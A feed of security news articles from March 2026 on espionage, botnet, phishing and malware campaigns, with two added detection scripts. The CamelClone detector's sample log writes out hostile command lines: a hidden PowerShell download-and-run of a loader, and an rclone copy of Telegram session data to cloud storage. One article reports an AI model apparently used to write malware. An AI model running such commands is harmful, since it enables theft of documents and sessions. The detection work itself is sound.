Published Tue, 17 Mar 2026 08:27:03 +0000: https://vpncentral.com/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/

A newly documented espionage campaign called Operation CamelClone is targeting government, defense, diplomatic, and strategic-sector entities across Algeria, Mongolia, Ukraine, and Kuwait. Seqrite says the attackers use spear-phishing ZIP files disguised as official government correspondence, then rely on public file-sharing sites and the legitimate tool Rclone to steal documents and Telegram session data without using a traditional command-and-control server.

What makes the operation stand out is its infrastructure model. Instead of building dedicated attacker-controlled servers, the operators host payloads on the public file-sharing site filebulldogs[.]com and move stolen files to MEGA cloud storage. That approach helps the traffic blend into ordinary internet activity and makes network-based detection harder.

Seqrite says the campaign first surfaced in late February 2026, when a suspicious ZIP file themed around Algeria’s Ministry of Housing appeared on VirusTotal. The researchers later found additional samples using Mongolia, Algeria-Ukraine cooperation, and Kuwait Air Force themed lures, which pointed to a broader intelligence-focused operation rather than an isolated phishing run.

How the CamelClone attack works

Each observed archive contained a malicious Windows shortcut file and a decoy image or document designed to look official. Seqrite says that when the victim opens the shortcut, a hidden PowerShell command runs silently, switches to the Temp directory, downloads a JavaScript file named f.js from filebulldogs[.]com, saves it locally, and executes it to continue the infection chain.

Seqrite tracks that JavaScript loader as HOPPINGANT. The file runs under Windows Script Host and launches two Base64-encoded PowerShell commands. Those commands download a decoy PDF to distract the victim, then fetch another archive named a.zip, which contains a portable copy of Rclone version 1.70.3.

After extracting Rclone, the script rebuilds a password with a simple XOR routine using the key value 56, then uses those credentials to authenticate to a MEGA account registered with an onionmail.org address. Seqrite says the malware then collects .doc, .docx, .pdf, and .txt files from the Desktop and also tries to exfiltrate Telegram Desktop session data from the tdata directory.

Why researchers see this as espionage, not routine cybercrime

Seqrite says the targeting pattern points toward intelligence collection. The victims and lure themes focused on government bodies, defense procurement, foreign affairs, diplomatic cooperation, and strategic energy-linked environments. The company says that choice of targets, plus the geopolitical themes in the decoy files, aligns more closely with spying goals than with financially motivated cybercrime.

The campaign also shows discipline in how it separates its operations. Seqrite observed the same file-sharing domain across all four campaigns, but with different upload paths such as /uploads/AVQB61TVOX/, /uploads/OKW5RN48ZJ/, and /uploads/F1OQY9GU84/. The researchers believe that separation helps the attackers run multiple parallel campaigns while reducing the chance that one takedown removes every payload at once.

Key details at a glance

Item | Detail
Campaign name | Operation CamelClone
Main targets | Government, defense, diplomatic, and strategic sectors
Countries named by Seqrite | Algeria, Mongolia, Ukraine, Kuwait
Initial delivery | Spear-phishing ZIP archive with malicious LNK
Loader | HOPPINGANT JavaScript
Payload abuse | Rclone v1.70.3 used for exfiltration
Payload hosting | filebulldogs[.]com
Exfiltration destination | MEGA accounts tied to onionmail.org emails

What makes CamelClone harder to detect

The campaign avoids the classic model of malware talking to a visible C2 server. Instead, it abuses public services that defenders often allow or treat as low-priority traffic. Seqrite says this model makes pure network detection less effective because the activity looks closer to standard web downloads and cloud storage use.

The attackers also reused key technical patterns across the campaigns. Seqrite says the same XOR key, the same HOPPINGANT loader family, and the same Rclone settings appeared in the different samples. Those overlaps strongly suggest a coordinated operation rather than unrelated attacks borrowing similar lures.

What organizations should do

  • Treat unsolicited ZIP files that reference ministries, defense deals, or diplomatic cooperation as high risk.
  • Restrict or monitor LNK execution from untrusted sources.
  • Watch for PowerShell launching JavaScript or downloading files into Temp paths.
  • Monitor outbound traffic to anonymous file-sharing sites and cloud storage services such as MEGA.
  • Hunt for suspicious use of Rclone on systems where it should not normally appear. This last point follows from Seqrite’s documented use of Rclone in the campaign.
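Detection logic for the infection chain described above and for the bullet list, written here as an added example and not Seqrite's code: it runs five stage rules over constructed process-creation events and flags a host once several stages line up. The JSON field names are an assumption modelled on a Sysmon Event ID 1 export, and the hostnames, user name and paths in the sample are invented.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Event is one process-creation record; the field names are an assumption modelled on a Sysmon Event ID 1 export.
type Event struct {
	TS     string `json:"ts"`
	Host   string `json:"host"`
	Parent string `json:"parent"`
	Image  string `json:"image"`
	Cmd    string `json:"cmd"`
}

// Constructed sample telemetry (hosts, user and paths invented): WS-ALG-07 walks the whole chain, the other two hosts are benign.
const sampleLog = `
{"ts":"2026-02-26T08:41:10Z","host":"WS-ALG-07","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -w hidden -c \"cd $env:TEMP; iwr hxxp://filebulldogs[.]com/uploads/AVQB61TVOX/f.js -OutFile f.js; wscript f.js\""}
{"ts":"2026-02-26T08:41:12Z","host":"WS-ALG-07","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","image":"C:\\Windows\\System32\\wscript.exe","cmd":"\"C:\\Windows\\System32\\wscript.exe\" C:\\Users\\a.benali\\AppData\\Local\\Temp\\f.js"}
{"ts":"2026-02-26T08:41:15Z","host":"WS-ALG-07","parent":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -NoP -W Hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="}
{"ts":"2026-02-26T08:42:30Z","host":"WS-ALG-07","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","image":"C:\\Users\\a.benali\\AppData\\Local\\Temp\\rclone\\rclone.exe","cmd":"rclone.exe copy \"C:\\Users\\a.benali\\AppData\\Roaming\\Telegram Desktop\\tdata\" mega:tdata --config C:\\Users\\a.benali\\AppData\\Local\\Temp\\rclone.conf"}
{"ts":"2026-02-26T09:00:00Z","host":"BACKUP-01","parent":"C:\\Windows\\System32\\services.exe","image":"C:\\Program Files\\rclone\\rclone.exe","cmd":"rclone.exe sync D:\\backups s3:corp-backups"}
{"ts":"2026-02-26T09:05:00Z","host":"ADMIN-02","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"}
`

var (
	psRe  = regexp.MustCompile(`(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$`)
	wshRe = regexp.MustCompile(`(?:^|\\)(?:wscript|cscript)\.exe$`)
	dlRe  = regexp.MustCompile(`iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget`)
	encRe = regexp.MustCompile(`(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+[a-z0-9+/=]{20,}`)
)

// stagesFor returns the CamelClone chain stages (1..5) that a single event matches.
func stagesFor(e Event, rcloneAllow map[string]bool) []int {
	cmd, img, parent := strings.ToLower(e.Cmd), strings.ToLower(e.Image), strings.ToLower(e.Parent)
	var s []int
	add := func(stage int, hit bool) {
		if hit {
			s = append(s, stage)
		}
	}
	// Stage 1: the LNK's hidden PowerShell switches to Temp and downloads the f.js loader.
	add(1, psRe.MatchString(img) && dlRe.MatchString(cmd) && strings.Contains(cmd, ".js") && (strings.Contains(cmd, `\temp\`) || strings.Contains(cmd, "env:temp")))
	// Stage 2: Windows Script Host runs a .js out of a Temp directory (HOPPINGANT).
	add(2, wshRe.MatchString(img) && strings.Contains(cmd, `\temp\`) && strings.Contains(cmd, ".js"))
	// Stage 3: the loader spawns Base64-encoded PowerShell (decoy PDF, then a.zip with Rclone).
	add(3, wshRe.MatchString(parent) && psRe.MatchString(img) && encRe.MatchString(e.Cmd))
	// Stage 4: rclone on a host where it is not approved; MEGA is the destination in the report.
	add(4, strings.HasSuffix(img, `\rclone.exe`) && !rcloneAllow[e.Host])
	// Stage 5: any command line touching Telegram Desktop's tdata session directory.
	add(5, strings.Contains(cmd, `\telegram desktop\tdata`))
	return s
}

// ParseEvents decodes newline-delimited JSON; lines that fail to parse are skipped.
func ParseEvents(log string) []Event {
	var events []Event
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		var e Event
		if err := json.Unmarshal([]byte(line), &e); err == nil {
			events = append(events, e)
		}
	}
	return events
}

// Analyze returns, per host, the set of chain stages seen; rcloneAllow lists hosts where rclone is approved.
func Analyze(events []Event, rcloneAllow map[string]bool) map[string]map[int]bool {
	seen := map[string]map[int]bool{}
	for _, e := range events {
		for _, st := range stagesFor(e, rcloneAllow) {
			if seen[e.Host] == nil {
				seen[e.Host] = map[int]bool{}
			}
			seen[e.Host][st] = true
		}
	}
	return seen
}

// ChainHosts lists hosts with at least minStages distinct stages: one stage is a lead to triage, three or more is the chain itself.
func ChainHosts(seen map[string]map[int]bool, minStages int) []string {
	var hosts []string
	for h, s := range seen {
		if len(s) >= minStages {
			hosts = append(hosts, h)
		}
	}
	sort.Strings(hosts)
	return hosts
}

func main() {
	seen := Analyze(ParseEvents(sampleLog), map[string]bool{"BACKUP-01": true})
	fmt.Println("likely CamelClone chain on:", ChainHosts(seen, 3))
}
```

Feed it real process telemetry in the same shape and keep the rclone allow list to the hosts where the tool is sanctioned; a single stage is a triage lead, while stages 1 to 3 together are the loader chain itself.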

FAQ

What is Operation CamelClone?

It is a multi-region espionage campaign that Seqrite says targeted government, defense, diplomatic, and strategic-sector entities using spear-phishing archives and a file-sharing based infection chain.

How does the malware avoid traditional C2 infrastructure?

Seqrite says the attackers host payloads on filebulldogs[.]com and upload stolen data to MEGA, rather than relying on dedicated attacker servers.

Why is Rclone important in this attack?

Because the attackers use the legitimate Rclone tool to transfer stolen files to MEGA, which helps the exfiltration blend in with normal cloud activity.

What data is at risk?

Seqrite says the campaign targets documents on the Desktop, including Word files, PDFs, text files, and Telegram Desktop session data.

RondoDox botnet expands to 174 exploits, using residential IP infrastructure at scale
Published Tue, 17 Mar 2026 08:22:45 +0000: https://vpncentral.com/rondodox-botnet-expands-to-174-exploits-using-residential-ip-infrastructure-at-scale/

A fast-growing botnet called RondoDox has expanded into a large exploitation operation that now uses 174 different vulnerabilities and leans on residential IP infrastructure to host parts of its malware delivery chain. Bitsight says the botnet peaked at 15,000 exploitation attempts in a single day, a scale that makes it one of the more aggressive exploit-driven botnet campaigns tracked in recent months.

Bitsight first observed RondoDox in May 2025 through heavy honeypot activity. The company says the malware reuses Mirai foundations, but unlike classic Mirai, RondoDox focuses on denial-of-service attacks rather than combining scanning, propagation, and DDoS activity inside one bot binary. Instead, the operators appear to split exploitation and hosting roles across separate infrastructure.

The standout detail is the size of the exploit arsenal. Bitsight says RondoDox implemented 174 different exploits, with 148 tied to known CVEs, 15 linked to public proof-of-concept code without formal CVEs, and 11 without public proof-of-concept code at all. That is an unusually broad set for a Mirai-style threat.

Researchers also found signs that the operators track vulnerability disclosures closely. Bitsight says the botnet adopted some exploits within days of public disclosure, including React2Shell, or CVE-2025-55182, which was added on December 6, 2025, just three days after disclosure. The researchers also said they saw one case where exploitation began before a CVE was officially published.

Number of Events and Moving Average for RondoDox Exploits (Source – Bitsight)

How RondoDox changed over time

Early in its campaign, RondoDox used what Bitsight described as a shotgun approach. The operators fired multiple exploits at the same target in hopes that one would work. According to the research, the number of distinct vulnerabilities used in a single day peaked at 49 on October 19, 2025.

That strategy later shifted. By January 2026, daily use dropped to just two active vulnerabilities, which Bitsight interprets as a move toward more selective and targeted exploitation instead of broad-volume probing.

Example of the Shotgun Approach Used by RondoDox (Source – Bitsight)

Why the residential IP angle matters

One of the most unusual parts of the operation is the infrastructure split. Bitsight tracked 32 IP addresses over the observation period, with 16 used for exploitation and 16 used for hosting. The exploitation IPs mostly mapped to hosting providers that accept cryptocurrency, while many hosting IPs appeared to belong to ordinary residential internet providers in countries including the United States, Canada, Sweden, China, and Tunisia.

Bitsight says this strongly suggests the operators used compromised home or consumer devices as hosting infrastructure. Using the Groma dataset, the researchers found that four of 11 residential hosting IPs exposed potentially vulnerable services, including a UniFi Protect interface, two Control4 smart home systems, and a TCL Android TV web server.

Page Returned When IP Is Blacklisted (Source – Bitsight)

That approach gives the botnet two advantages. It makes the infrastructure look less suspicious than traditional VPS hosting, and it can complicate takedown and attribution efforts because the servers may actually be hijacked consumer devices rather than rented attacker-owned systems. This second point is an inference from Bitsight’s findings about residential ISP usage and exposed consumer services.

Key details at a glance

Item | Detail
Botnet | RondoDox
First observed | May 2025
Core base | Mirai-derived
Main purpose | DoS attacks
Exploit count | 174
Peak activity | 15,000 exploitation attempts in one day
Infrastructure tracked | 32 IPs total
Hosting pattern | Mix of crypto-friendly hosting and likely compromised residential IPs

What security teams should do

  • Patch internet-facing devices quickly, especially embedded devices and remote management interfaces.
  • Disable unused remote access services on home, branch, and edge-connected systems.
  • Watch for repeated exploitation attempts against exposed services, especially newly disclosed flaws.
  • Monitor outbound connections to suspicious hosting nodes and investigate consumer-device infrastructure where it should not exist. This detection advice partly follows from Bitsight’s infrastructure findings.
  • Review the indicators of compromise Bitsight published through its GitHub-linked materials referenced in the report.

FAQ

What is RondoDox?

RondoDox is a Mirai-derived botnet that Bitsight says focuses on denial-of-service attacks and uses a large exploit arsenal to compromise internet-exposed devices.

How many exploits does it use?

Bitsight says it uses 174 different exploits, including 148 tied to known CVEs.

Why are residential IPs important in this case?

Because Bitsight found evidence that some malware hosting infrastructure likely ran on compromised home or consumer-connected devices, which makes the operation harder to spot and disrupt.

Is RondoDox still using the same broad attack style?

Not exactly. Bitsight says the botnet moved from a broad shotgun model to a more focused approach by early 2026.

B says that in Egypt, for example, attackers were observed using numbers formatted to resemble local mobile prefixes.
Published Tue, 17 Mar 2026 08:17:33 +0000: https://vpncentral.com/b-says-that-in-egypt-for-example-attackers-were-observed-using-numbers-formatted-to-resemble-local-mobile-prefixes/

Once the victim taps the link, the phishing page often checks the user agent and shows its full content only on mobile browsers. Attackers also add endings such as index.html or similar masks to make links look more convincing and help the page load correctly on phones.

The pages usually present fake tracking details, a claimed reason for failed delivery, and a request to update address data or pay a small fee. The pressure is psychological, not technical. The goal is to make the victim act before thinking.

What makes the phishing technically dangerous

Group-IB says its HTML analysis found embedded scripts that open WebSocket connections and support live credential harvesting. In practice, that means attackers can receive entered data immediately, rather than waiting for the victim to submit a form and leave the page.

The researchers also found session tracking through unique UUID tokens, which suggests organized operations that manage victims individually and at scale. That infrastructure, combined with shared IPs, registrars, and hosting overlaps, points to coordinated phishing activity rather than isolated copycat pages.

Group-IB also says the campaign shows signs linked to Darcula, a Chinese-language phishing-as-a-service platform known for large volumes of counterfeit domains and ready-made phishing templates. The company says customers can review more detail about the activity and the Darcula Pushing Kit in its threat intelligence portal.

What Group-IB found in MEA

Finding | Detail
Main lure | SMS delivery failure message
Common asks | Address update, handling fee, taxes, tariffs
Main targets | Postal and delivery brands, then banks, telecom, mobility, e-commerce
User focus | Mobile users
Data at risk | Personal details, banking credentials, card numbers, CVV, OTPs
Delivery method | Phishing links sent through SMS

Why the scam keeps working

Shipment alerts blend into daily life. If people shop online often, they already expect delivery texts, tracking updates, and occasional address checks. Criminals exploit that normal behavior and make the fake message feel just plausible enough to trigger a fast tap.

The fake domains also help. Group-IB warns that many of these campaigns use disposable or low-cost extensions such as .xyz, .sbs, .top, and .click, which lets attackers replace blocked domains quickly and keep the scam moving.

How to protect yourself

  • Do not tap shipment links from unexpected SMS messages. Go to the courier’s official website and enter the tracking number manually.
  • Treat any message demanding urgent payment or address correction as suspicious. Legitimate courier companies usually do not charge for simple redelivery or basic address updates.
  • Watch for unfamiliar domain endings such as .xyz, .sbs, .top, and .click.
  • Use mobile security tools and browser protections that can flag phishing pages and suspicious links.
  • Report scam messages to your postal operator or local cyber authority.

What businesses should do

  • Publish clear alerts when scammers impersonate your brand.
  • Strengthen domain protections and email authentication with DMARC, DKIM, and SPF. Group-IB’s post appears to contain a typo and says “SKIM,” but the standard email protocol is DKIM.
  • Work with mobile operators to filter scam SMS patterns and block impersonation attempts.
  • Offer a public verification tool so users can confirm whether a message or tracking request is legitimate.

FAQ

What is a fake shipment tracking scam?

It is a phishing scheme where victims receive a fake delivery failure text and are pushed to a bogus courier page that steals personal and financial data.

Why is MEA seeing more of these attacks?

Group-IB says the activity has grown sharply since early 2024 and surged through 2025, especially as delivery and courier services have become a routine part of daily life.

What data do the attackers want?

They target personal information, banking credentials, card numbers, CVV codes, and one-time passwords.

What is the safest response to a delivery fee text?

Do not use the link in the message. Open the courier’s official website yourself and check the shipment manually.

IBM finds ‘Slopoly,’ likely AI-generated malware linked to Hive0163 ransomware attack
Published Tue, 17 Mar 2026 08:11:41 +0000: https://vpncentral.com/ibm-finds-slopoly-likely-ai-generated-malware-linked-to-hive0163-ransomware-attack/

IBM X-Force says it uncovered a likely AI-generated malware strain called Slopoly during a ransomware incident tied to the financially motivated threat group Hive0163. The malware appeared late in the intrusion and acted as the client side of a custom command-and-control framework, giving the attackers persistent access to an infected server for more than a week.

The finding matters because it shows how threat actors can now use AI to create working malware faster and with less development effort. IBM says Slopoly was technically mediocre, but its structure strongly suggested AI-assisted creation, including clear variable names, detailed comments, and coding choices that looked more like machine-generated output than hand-crafted malware.

IBM linked the activity to Hive0163, a group associated with extortion, large-scale data theft, and Interlock ransomware operations. X-Force says the group already uses a broader toolset that includes NodeSnake, InterlockRAT, and the JunkFiction loader, which helps explain why Slopoly appeared as just one part of a wider attack chain rather than as a standalone weapon.

What IBM found

According to IBM, Slopoly was a PowerShell script dropped on an already infected server and stored under C:\ProgramData\Microsoft\Windows\Runtime\. It established persistence through a scheduled task named Runtime Broker, then beaconed to a remote server using static configuration values such as a session ID, mutex name, C2 URL, and beacon intervals. IBM said it could not recover the commands the attackers ran during the period when Slopoly stayed active.

IBM also said the malware called itself a “Polymorphic C2 Persistence Client,” but the script did not actually show true polymorphic behavior. That mismatch was one reason the researchers described it as more ambitious in wording than in real capability.

Redacted snippet of Slopoly script (Source – IBM)

Why IBM believes AI helped create it

IBM did not identify the exact model used to generate Slopoly, but the company said the code quality and structure pointed to a less advanced model. X-Force highlighted signs such as verbose comments, consistent error handling, descriptive variable names, and even an unused Jitter function that may have been left behind during iterative AI-assisted development.

IBM also said the variable naming suggested the model intended to build something malicious from the start, which implies any guardrails in the tool used to create the malware were bypassed or ineffective.

How the attack started

IBM says the intrusion began with a ClickFix technique. In that method, victims see a fake verification page that quietly places a malicious command in the clipboard, then tells them to open the Run dialog, paste it, and execute it. That manual action gives the attackers an easy path to launch PowerShell without needing a traditional exploit.

From there, the attack chain expanded in stages. IBM says NodeSnake arrived first as a Node.js backdoor, followed by InterlockRAT, which added WebSocket communication, a SOCKS5 tunnel, and a reverse shell. Slopoly came later, alongside tools such as AzCopy and Advanced IP Scanner, suggesting it served more as a persistence and operational support tool than as the initial foothold.

Simplified infection diagram (Source – IBM)

Key details at a glance

Item | Detail
Malware name | Slopoly
Researcher | IBM X-Force
Threat group | Hive0163
Associated ransomware | Interlock
Malware type | Likely AI-generated PowerShell C2 client
Persistence | Scheduled task named Runtime Broker
Initial access method | ClickFix
Related tools | NodeSnake, InterlockRAT, JunkFiction

Why this matters beyond one case

IBM’s report lines up with a broader industry view that attackers have started using AI across different stages of cybercrime. Palo Alto Networks’ 2026 Unit 42 Global Incident Response Report says threat actors remain in the early stages of AI-enabled tradecraft, but the impact is already visible across reconnaissance, social engineering, scripting, troubleshooting, and extortion workflows.

That does not mean AI-generated malware is suddenly more advanced than traditional malware. IBM made the opposite point in this case. Slopoly was not especially sophisticated, but it proved that capable attackers can use AI to shorten development time and add custom tooling to a live ransomware operation.

C2 panel displayed on plurfestivalgalaxy[.]com (Source – IBM)

What defenders should do

  • Watch for ClickFix-style lures that push users to paste commands into the Run dialog or PowerShell.
  • Monitor scheduled task creation, especially suspicious tasks such as Runtime Broker in unusual paths.
  • Hunt for IBM’s published indicators, including the reported Slopoly C2 infrastructure.
  • Use behavior-based detection, not just signature-based tools, since AI-assisted malware can change quickly and may not match known patterns.
  • Review user training around fake verification pages and clipboard-based social engineering.

FAQ

What is Slopoly?

Slopoly is the name IBM X-Force gave to a likely AI-generated PowerShell malware client discovered during a Hive0163 ransomware attack.

Was the malware highly advanced?

No. IBM described it as technically mediocre, even though it still proved useful for persistence and command-and-control during a real intrusion.

How did the attackers get in?

IBM says the intrusion started with a ClickFix social engineering trick that pushed the victim to run a malicious command manually.

Why is the AI angle important?

Because it shows attackers can use AI to speed up malware creation and adapt custom tools during ransomware operations, even when the code itself is not highly sophisticated.

Qihoo 360 shipped wildcard SSL private key inside public AI installer
Published Tue, 17 Mar 2026 08:07:02 +0000: https://vpncentral.com/qihoo-360-shipped-wildcard-ssl-private-key-inside-public-ai-installer/

Qihoo 360 appears to have bundled a live wildcard TLS private key inside the public installer for its new AI assistant, exposing a certificate for *.myclaw.360.cn to anyone who downloaded the package. Security researcher Lukasz Olejnik publicly flagged the issue, and follow-up reporting says the certificate has since been revoked.

The core problem is simple and serious. A private key should never ship inside a public installer. If an attacker gets that key before revocation takes effect, they may be able to impersonate covered subdomains, intercept traffic in some scenarios, or stand up convincing phishing infrastructure that appears cryptographically valid.

Reports tied to the disclosure say the key sat inside the installer under an OpenClaw component archive, alongside credentials for the myclaw.360.cn environment. The leaked certificate reportedly carried the subject CN=*.myclaw.360.cn, with a validity period running from March 12, 2026 to April 12, 2027.

What was exposed

The exposed material was not just a public certificate. Reporting around the incident says the installer contained the matching private key, and modulus checks showed that the key and certificate formed a valid pair. That is what turns a bad packaging mistake into a potentially high-impact security incident.

Because the certificate was a wildcard, the scope was broader than a single host. In general, a wildcard certificate can authenticate every covered subdomain under the same namespace, which increases the blast radius of any private key leak.

Why this matters

TLS private keys are the trust anchor behind HTTPS sessions. If a production key leaks, defenders have to assume the certificate is compromised, revoke it quickly, replace it, and review the build pipeline that allowed it to leave internal systems. That is especially true when the installer was available to the public.

The incident also lands awkwardly for Qihoo 360 because the company sells security software and positioned this AI product as a safer way to use the OpenClaw ecosystem. Public discussion of the case quickly focused on that contradiction.

What Qihoo 360 has said

A company response reported by Futu News says 360 promptly revoked the certificate and argued that ordinary users would not be affected because the related service operated only on local systems. I have not independently verified that claim from a primary company post, so it should be treated as a reported company response rather than a directly confirmed public statement from Qihoo 360.

That explanation may reduce the practical risk if the certificate truly protected only a localhost-style workflow. But it does not erase the packaging failure itself, and it leaves open important questions about why a valid private key ended up inside a public build.

Key details at a glance

Item              Detail
Company           Qihoo 360
Product           360 AI assistant built around OpenClaw
Exposed asset     Wildcard TLS private key and matching certificate
Reported domain   *.myclaw.360.cn
Reported status   Certificate revoked
Main issue        Sensitive key material shipped in public installer

Reported details above come from public disclosure and follow-up reporting.

What security teams should watch

  • Public installers and update packages should never contain live production credentials.
  • Code signing and release pipelines need automated checks for certificates, private keys, tokens, and other secrets before release.
  • If a private key leaks, teams should revoke, replace, rotate, and investigate immediately.

FAQ

Did Qihoo 360 really leak a private key?

Public reporting and a disclosure from Lukasz Olejnik indicate that a wildcard TLS private key for *.myclaw.360.cn was included in the public installer.

Was the certificate revoked?

Reportedly yes. Futu News says 360 revoked the certificate, and another report repeated the same point. I have not found a primary public company statement through official 360 channels in the search results I reviewed.

Were ordinary users affected?

That remains less clear. A reported company response said regular users would not be affected because the service resolved to local systems, but I could not independently confirm that from a primary source.

Why is this a big deal?

Because private keys are supposed to stay secret. Once they appear in a public installer, trust in the affected certificate collapses and the release process itself comes under scrutiny.

Fake FileZilla downloads spread RAT through stealthy multi-stage loader
https://vpncentral.com/fake-filezilla-downloads-spread-rat-through-stealthy-multi-stage-loader/
Tue, 17 Mar 2026 08:02:59 +0000

A new malware campaign is using fake FileZilla download pages to infect Windows users with a remote access trojan, or RAT. Researchers say the attackers bundle a legitimate copy of FileZilla with a malicious DLL, so the software appears to install normally while hidden code runs in the background.

The attack does not rely on a software vulnerability. Instead, it relies on social engineering and DLL sideloading, which makes the lure more effective because victims believe they are downloading a trusted FTP client from a real-looking site. Researchers traced the campaign to a lookalike domain, filezilla-project[.]live, hosting a tampered FileZilla 3.69.5 portable package.

Once launched, the malicious package loads a rogue version.dll before Windows reaches the legitimate system library. Malwarebytes said the archive contained 918 files, but only one stood out as suspicious: version.dll, which should not appear inside a clean FileZilla portable folder.

The campaign goes beyond simple sideloading. Malwarebytes reported that the trojanized FileZilla build quietly contacts attacker-controlled servers through encrypted DNS traffic, helping the malware hide its network activity inside normal-looking HTTPS requests.

Fake FileZilla Site (Source – Alyac)

How the fake FileZilla attack works

Researchers say victims land on a fake FileZilla page that closely mimics the real project site, then download a tampered installer or archive. In the observed sample, the threat actor used a legitimate portable build of FileZilla 3.69.5 and inserted a malicious version.dll into the application folder. When the victim opens filezilla.exe, Windows loads that DLL first because of its standard search order behavior.

This gives the attacker code execution without breaking the visible app. To the user, FileZilla still opens and behaves normally, which lowers suspicion and gives the malware time to continue the infection chain.

The reporting around this campaign also describes a stealthy loader sequence that can keep later stages in memory rather than dropping obvious files to disk. That design makes detection harder for security tools that focus mainly on static files and traditional installer behavior.

FileZilla Compressed File with Malicious DLL Added (Source – Alyac)

Why this campaign matters

The biggest risk is trust abuse. FileZilla is a well-known open-source tool, so many users will not question a familiar download page or a normal-looking setup flow. That makes fake download infrastructure especially effective against home users, freelancers, developers, and IT staff who often install utilities quickly.

This campaign also fits a wider trend. Malwarebytes recently documented other cases where attackers abused trusted software brands and fake download pages to push malware, including fake 7-Zip downloads and fake productivity software installers.

Comparison of Malicious Installation File and Normal Installation File (Source – Alyac)

Key details at a glance

Item                  Detail
Lure                  Fake FileZilla download site
Real software abused  FileZilla 3.69.5 Portable
Main execution trick  DLL sideloading
Suspicious file       version.dll
Reported behavior     Hidden malware runs while FileZilla appears normal
Network trait         Encrypted DNS traffic to attacker-controlled infrastructure

What users and admins should do

  • Download FileZilla only from the official FileZilla project site.
  • Treat lookalike domains and search-result download pages as high risk.
  • Check the FileZilla folder for unexpected files such as version.dll.
  • Monitor endpoints for DLL sideloading behavior and unusual outbound encrypted DNS activity.
  • Reinstall the software from the official source if a user downloaded FileZilla from any unofficial site.
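One way to carry out the folder check in the list above: compare a downloaded FileZilla portable tree against a known-good copy by relative path and SHA-256, so that an added version.dll stands out the way it did in the Alyac comparison. This is an added example, not code from Malwarebytes, Alyac or the FileZilla project; the sample trees it builds are constructed, and its suspect-name set holds only the version.dll named in the reporting.

```python
import hashlib
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List

# DLL names the reporting above flags as out of place in a clean FileZilla
# portable folder. Only version.dll comes from the page; extend as you see fit.
SUSPECT_DLLS = {"version.dll"}


@dataclass
class InventoryDiff:
    added: Dict[str, str] = field(default_factory=dict)     # relpath -> sha256
    removed: Dict[str, str] = field(default_factory=dict)   # relpath -> sha256
    modified: Dict[str, str] = field(default_factory=dict)  # relpath -> new sha256

    def suspect_additions(self) -> List[str]:
        """Added files whose basename matches a DLL that should not sit in the app folder."""
        return sorted(p for p in self.added if Path(p).name.lower() in SUSPECT_DLLS)

    def is_clean(self) -> bool:
        return not (self.added or self.removed or self.modified)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root: Path) -> Dict[str, str]:
    """Map every regular file under root to its SHA-256, keyed by POSIX-style relative path."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_packages(reference: Path, candidate: Path) -> InventoryDiff:
    """Compare a downloaded package tree (candidate) against a known-good tree (reference)."""
    ref, cand = inventory(reference), inventory(candidate)
    d = InventoryDiff()
    for rel, digest in cand.items():
        if rel not in ref:
            d.added[rel] = digest
        elif ref[rel] != digest:
            d.modified[rel] = digest
    for rel, digest in ref.items():
        if rel not in cand:
            d.removed[rel] = digest
    return d


def build_demo_trees(base: Path):
    """Constructed sample: a clean tree and a copy with an extra version.dll dropped in."""
    clean, tampered = base / "clean", base / "tampered"
    for tree in (clean, tampered):
        (tree / "resources").mkdir(parents=True, exist_ok=True)
        (tree / "filezilla.exe").write_bytes(b"MZ placeholder, not a real executable")
        (tree / "resources" / "strings.xml").write_text("<strings/>")
    (tampered / "version.dll").write_bytes(b"MZ placeholder, stands in for the rogue DLL")
    return clean, tampered


def run_demo() -> InventoryDiff:
    """Build the constructed trees in a temporary directory and diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, tampered = build_demo_trees(Path(tmp))
        return diff_packages(clean, tampered)


if __name__ == "__main__":
    result = run_demo()
    print("added:   ", sorted(result.added))
    print("modified:", sorted(result.modified))
    print("removed: ", sorted(result.removed))
    print("suspect: ", result.suspect_additions())
```

For a real check, point diff_packages at an extracted official archive and the downloaded one; any added or modified file, not only version.dll, deserves a look before the client is run.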

FAQ

Was the official FileZilla site compromised?

The available reporting points to a fake lookalike domain, not the official FileZilla project website.

How does the malware start running?

It uses DLL sideloading. Windows loads the malicious version.dll from the FileZilla folder before it loads the legitimate system DLL.

Why is this hard to detect?

The app still appears to work normally, and the malware can use encrypted DNS traffic that blends into normal HTTPS activity.

What is the safest way to avoid this threat?

Download FileZilla directly from the official project website and avoid unfamiliar mirrors, ads, or lookalike pages.

New ACRStealer variant uses syscall evasion, TLS C2, and flexible payload switching
https://vpncentral.com/new-acrstealer-variant-uses-syscall-evasion-tls-c2-and-flexible-payload-switching/
Tue, 17 Mar 2026 07:54:09 +0000

A newly documented ACRStealer variant shows a clear jump in stealth and flexibility. Security researchers say the malware now relies on low-level Windows syscalls to avoid common user-mode monitoring, uses TLS for encrypted command-and-control traffic, and can work within a delivery chain that swaps final payloads without rebuilding the full infection flow. Those changes make detection harder and incident response more complex.

